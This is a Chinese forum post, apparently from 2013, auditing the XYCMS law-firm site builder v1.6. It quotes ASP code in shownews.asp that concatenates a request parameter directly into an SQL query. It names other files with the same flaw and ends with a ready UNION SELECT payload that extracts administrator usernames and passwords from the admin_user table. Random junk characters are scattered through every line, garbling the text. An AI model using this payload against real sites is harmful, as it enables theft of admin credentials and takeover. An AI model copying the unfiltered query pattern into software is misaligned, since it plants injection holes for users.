前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似. ~* ] d! d& z1 V
# N0 T7 z H p! x0 c1 H
淫荡分割线% w& m6 K" r+ W0 D
--------------------------------------------------------. D: z0 h- s& I8 {6 s- V
1 ^9 ~/ G& D6 e9 k4 J v6 H# f审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
6 E( X) U6 O$ e$ }& F源码地址:http://down.chinaz.com/soft/29233.htm
6 V4 }* \( w: X- s4 F a2 ]4 ~# h % ^2 ?0 f5 |/ V) a7 j2 g9 f2 `# h
漏洞文件:shownews.asp
; |" |3 O! }" r% l1 j- u漏洞代码:7-13行 ?, q" J1 J! G
5 [/ w9 \# r& x# Z# m M* y- X$ }# ^2 ?
<%
3 E' m3 G/ d. u! ^2 r0 Mid=request.QueryString("id"). q4 I f0 E6 t0 G4 v* K5 q
; ?7 \/ _* |6 I/ Uset snews=server.createobject("adodb.recordset") ) G& l5 \0 R) r1 Y
exec="select * from [news] where id="&id+ r d$ \3 P }" V
snews.open exec,conn,1,1
6 @# D6 A! [; l4 a% F" q%>& F/ Z- @6 Y: w# r
* {. b" p2 [! x
7 q2 r; g9 O! {) E1 y) g
什么过滤都没有 直造成注入; y( p2 A2 [. i, H9 C7 j) w! C
- `) |) ~ G7 g# D3 l+ s
注入点:http://127.0.0.1:99/shownews.asp?id=xx
! {. ^- Z' {; l Y# p" R4 Y
7 }1 j" M$ c: D& n6 Q其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找; K) x2 E ] V% n; x0 n
3 M5 b7 L: w& `7 ]# r4 R3 d
* ]% }" U' ?8 [! u7 B: ^exp: union select 1,admin,password,4,5,7 from admin_user
' h. u# n( h( i' n' T; S2 b8 ^! Y4 s3 o
|
发表于 2013-4-4 17:28:12
收藏
支持
反对